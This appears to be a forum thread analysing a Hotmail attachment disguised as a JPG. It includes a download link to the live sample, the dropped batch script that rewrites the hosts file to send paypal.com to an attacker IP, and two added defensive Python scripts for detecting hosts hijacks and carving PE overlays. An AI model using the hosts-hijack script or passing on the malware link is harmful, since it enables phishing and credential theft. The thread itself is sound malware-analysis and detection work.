
Not detected yet!?

While checking my email yesterday at Hotmail I got an email from a Nicole Smith. The email was an attachment of what appeared to be a valid jpg file: "nicole256.jpg". When I put my mouse on the image I noticed the link on the status bar was not to the "nicole256.jpg" file but instead to another site, "hxxp://201.241.111.30/pics/nicole256.php". Needless to say, it was a spoofed link to an "exe" file. I downloaded the file and scanned it with AVP KAV 7.0 with the very latest definitions and it found nothing. Nope, not even as suspicious. I have included 3 screenshots: what appeared to be a suspicious string in the source code of the Hotmail page, and 2 screen captures of the scan from VirusTotal; several scanners did register it as malware and a couple as suspicious. Is this a new technique/method of infecting? For a long time now Hotmail had always restricted almost all attachments, but this one seemed to get by with no problem.

When I submitted the file at the KAV site for a scan, it told me the file was OK.

Here is the direct link from RapidShare. No wait time or code to enter, just click or right-click and use "Save As". The executable in the rar file is a DOS rar file, so the files inside can be extracted.
Password is "infected"

copy & paste
download:
http://rapidshare.com/files/94036809/Nicole256.rar.html

or

click or right click

This is for the executable file.
MD5: 41db2e70747cfc721697619009dd87c8

Cute delphi/bat virus

Had .bat content in its overlay.

The .bat is created in %temp%.

Its name is always "bt" followed by 4 random digits and ".bat".
Content:


@shift 1
@echo off
echo 201.241.111.30 http://www.paypal.com >>%windir%\System32\drivers\etc\hosts
echo 201.241.111.30 www.paypal.com >>%windir%\System32\drivers\etc\hosts
echo 201.241.111.30 paypal.com >>%windir%\System32\drivers\etc\hosts


[Hotmail Exploit]
MsgContainer=HTML:
"

Te env edo la foto que hab eda olvid

I'm sending you the picture I had forgotten, hopefully you like it, kisses!!

file attached:
Nicole256.jpg

"

The message has 2 $00 bytes, here: "Te env#00edo la foto que hab#00eda olvid",
which is probably also causing trouble for their text processor. Who knows :)

So basically it's a PayPal scam virus + site. I did ping it; no response, so actions have probably been taken on it.
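The hosts-file redirection the dropped .bat performs is something you can check for directly. What follows is an added example, not code from this post or from the sample it describes: it parses a hosts file, strips URL residue from names like "http://www.paypal.com" (the first line the dropper writes is not even a valid hosts entry), and flags any watched domain that is mapped to a non-local address. The sample hosts content is constructed from a default Windows hosts file plus the three lines the .bat appends; the WATCHED set is an assumption to extend for your own environment.

```python
import ipaddress
import os

# Constructed sample: a default Windows hosts file followed by the three
# lines the dropped bt####.bat appends (IP and names taken from the post).
SAMPLE_HOSTS = """\
# Copyright (c) 1993-1999 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
127.0.0.1       localhost
201.241.111.30 http://www.paypal.com
201.241.111.30 www.paypal.com
201.241.111.30 paypal.com
"""

# Assumption: the domains worth protecting against hosts-file hijacks.
WATCHED = {"paypal.com", "ebay.com", "microsoft.com"}


def parse_hosts(text):
    """Yield (line_no, ip, names) for every non-comment, non-blank line."""
    for line_no, raw in enumerate(text.splitlines(), start=1):
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        yield line_no, fields[0], fields[1:]


def is_local(ip_text):
    """True for loopback/private/link-local/unspecified addresses, the only
    targets a legitimate hosts entry normally has. Unparseable text is not local."""
    try:
        ip = ipaddress.ip_address(ip_text)
    except ValueError:
        return False
    return ip.is_loopback or ip.is_private or ip.is_link_local or ip.is_unspecified


def normalize_name(name):
    """Lower-case, drop a trailing dot, and strip URL residue such as the
    'http://www.paypal.com' line the dropper writes."""
    name = name.lower().rstrip(".")
    if "://" in name:
        name = name.split("://", 1)[1]
    return name.split("/", 1)[0]


def watched_domain(name):
    """Return the WATCHED domain that `name` equals or is a subdomain of."""
    labels = name.split(".")
    for i in range(len(labels) - 1):
        candidate = ".".join(labels[i:])
        if candidate in WATCHED:
            return candidate
    return None


def find_hijacks(text):
    """One finding per (line, name) mapping a watched domain to a non-local IP."""
    findings = []
    for line_no, ip, names in parse_hosts(text):
        if is_local(ip):
            continue
        for raw in names:
            name = normalize_name(raw)
            domain = watched_domain(name)
            if domain:
                findings.append({"line": line_no, "ip": ip,
                                 "name": name, "domain": domain})
    return findings


def default_hosts_path():
    """Location of the live hosts file on Windows and on Unix-like systems."""
    if os.name == "nt":
        root = os.environ.get("SystemRoot", r"C:\Windows")
        return os.path.join(root, "System32", "drivers", "etc", "hosts")
    return "/etc/hosts"


def scan_file(path=None):
    """Scan a real hosts file (defaults to the platform location)."""
    with open(path or default_hosts_path(), encoding="utf-8", errors="replace") as fh:
        return find_hijacks(fh.read())


if __name__ == "__main__":
    for f in find_hijacks(SAMPLE_HOSTS):
        print(f"line {f['line']}: {f['name']} -> {f['ip']} (hijacks {f['domain']})")
```

Run `scan_file()` on a machine you suspect; on the constructed sample it reports the two www.paypal.com entries and the paypal.com entry, all pointing at 201.241.111.30. The check deliberately keys on "non-local destination" rather than on a fixed IP, since the attacker's server changes but the pattern of pointing a payment domain at a public address does not.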


Looks like a Quick Batch File Compiler file.
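Quick Batch File Compiler wraps a script in a stub executable, and the earlier post reports the .bat content was readable in the overlay, the bytes appended after the last PE section. The following is an added example, not the poster's tool and not a reproduction of QBFC's own container format: it walks the PE section table to find where the overlay starts, carves it, and looks for the batch-file markers seen in the dropped script. The sample executable is a constructed, non-loadable PE32 skeleton carrying the hosts-file batch from the post as its overlay; the marker list is an assumption drawn from that script.

```python
import struct

# Indicators of a batch script aimed at the hosts file, taken from the
# .bat content shown in the post (assumed marker list).
BATCH_MARKERS = [b"@echo off", b"@shift", b"drivers\\etc\\hosts", b">>%windir%"]

# Constructed overlay: a little padding, then the dropped script verbatim.
SAMPLE_OVERLAY = (
    b"\x00" * 16
    + b"@shift 1\r\n@echo off\r\n"
    + b"echo 201.241.111.30 www.paypal.com >>%windir%\\System32\\drivers\\etc\\hosts\r\n"
    + b"echo 201.241.111.30 paypal.com >>%windir%\\System32\\drivers\\etc\\hosts\r\n"
)


def build_sample_pe(overlay):
    """Construct a minimal single-section PE32 skeleton (just enough header
    for section-table parsing; not loadable) and append `overlay` after the
    section's raw data. Constructed for this example only."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\x00" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    size_opt = 0xE0                                   # PE32 optional header size
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, size_opt, 0x0102)
    opt = b"\x0B\x01" + b"\x00" * (size_opt - 2)      # Magic 0x10B, rest zeroed
    raw_ptr = e_lfanew + 4 + 20 + size_opt + 40       # data right after section table
    raw_size = 0x200
    sec = b".text\x00\x00\x00" + struct.pack(
        "<IIIIIIHHI", raw_size, 0x1000, raw_size, raw_ptr, 0, 0, 0, 0, 0x60000020)
    headers = dos + b"PE\x00\x00" + coff + opt + sec
    return headers + b"\x90" * raw_size + overlay


def overlay_offset(data):
    """Offset of the first byte past the headers and all section raw data,
    i.e. where an overlay would begin. Raises ValueError on non-PE input."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("PE signature not found")
    nsec = struct.unpack_from("<H", data, e_lfanew + 6)[0]        # NumberOfSections
    size_opt = struct.unpack_from("<H", data, e_lfanew + 20)[0]   # SizeOfOptionalHeader
    sec_table = e_lfanew + 24 + size_opt
    end = sec_table + 40 * nsec
    for i in range(nsec):
        # SizeOfRawData and PointerToRawData sit at +16 in each 40-byte entry
        raw_size, raw_ptr = struct.unpack_from("<II", data, sec_table + 40 * i + 16)
        if raw_size:
            end = max(end, raw_ptr + raw_size)
    return min(end, len(data))


def extract_overlay(data):
    return data[overlay_offset(data):]


def batch_indicators(data):
    """Return the BATCH_MARKERS present in the file's overlay, if any."""
    ov = extract_overlay(data)
    return [m for m in BATCH_MARKERS if m in ov]


def overlay_text_lines(data):
    """Non-empty lines of the overlay decoded as latin-1, padding stripped,
    for a quick look at an embedded script."""
    ov = extract_overlay(data)
    return [ln.decode("latin-1").strip("\x00 ")
            for ln in ov.splitlines() if ln.strip(b"\x00 \r")]


if __name__ == "__main__":
    sample = build_sample_pe(SAMPLE_OVERLAY)
    print("overlay at 0x%x, %d bytes" % (overlay_offset(sample), len(extract_overlay(sample))))
    print("indicators:", batch_indicators(sample))
    for line in overlay_text_lines(sample):
        print("  " + line)
```

To use it on a real sample, read the file as bytes and call `batch_indicators` and `overlay_text_lines` on it. A compiler that compresses or encrypts the embedded script will defeat the plain string match, so treat an empty indicator list on a file that still has a sizeable overlay as "unknown", not "clean".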


Thanks for the feedback. KAV finally got it to show up as malicious!
"detected: Trojan program Trojan.BAT.Qhost.u"

®(¯`·._(¯`·._:-.*kreepz86*.-:_.·´¯)_.·´¯)®

It's a Dropper DR/Qhost.U

Avira Antivir reports the file as a dropper DR/Qhost.U

Here's a screen: http://img245.imageshack.us/my.php?image=drqhostudroppereq0.jpg This a/v has never let me down... though it gives a false positive sometimes, but it's better to be safe than sorry... It's prevented me from formatting my computer for 4 months now!! This is big, as usually when I had Norton or some other thing like McAfee installed it would barely be a month!


http://www.youtube.com/watch?v=ODshB09FQ8w